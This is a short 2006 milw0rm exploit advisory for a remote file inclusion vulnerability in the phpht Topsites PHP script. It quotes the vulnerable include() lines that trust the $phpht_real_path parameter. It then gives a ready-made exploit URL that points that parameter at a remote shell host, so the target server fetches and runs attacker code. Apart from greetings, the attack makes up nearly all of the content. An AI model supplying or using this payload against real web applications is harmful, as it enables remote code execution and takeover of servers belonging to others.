42 lines
No EOL
1.3 KiB
Text
42 lines
No EOL
1.3 KiB
Text
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
phpht Topsites (phpht_real_path) Remote File Include Vulnerability
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
Author: xoron
|
|
|
|
www.xoron.biz - www.xoron.info
|
|
|
|
Ne mutlu Türküm Diyene..!
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
URL:
|
|
http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
CODE:
|
|
|
|
|
|
include($phpht_real_path . 'config.'.$phpEx);
|
|
include($phpht_real_path . 'includes/db.'.$phpEx);
|
|
include($phpht_real_path . 'includes/Template.'.$phpEx);
|
|
include($phpht_real_path . 'language/lang_english/lang_main.'.$phpEx);
|
|
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
Exploit:
|
|
|
|
http://www.hedef.com/[script_path]/common.php?phpht_real_path=http://sh3LL?
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
Thanx: chaos, nukedx, OG, Preddy, Ironfist, SHiKaA, ERNE :)
|
|
Special: Str0ke
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|
|
|
# milw0rm.com [2006-10-12] |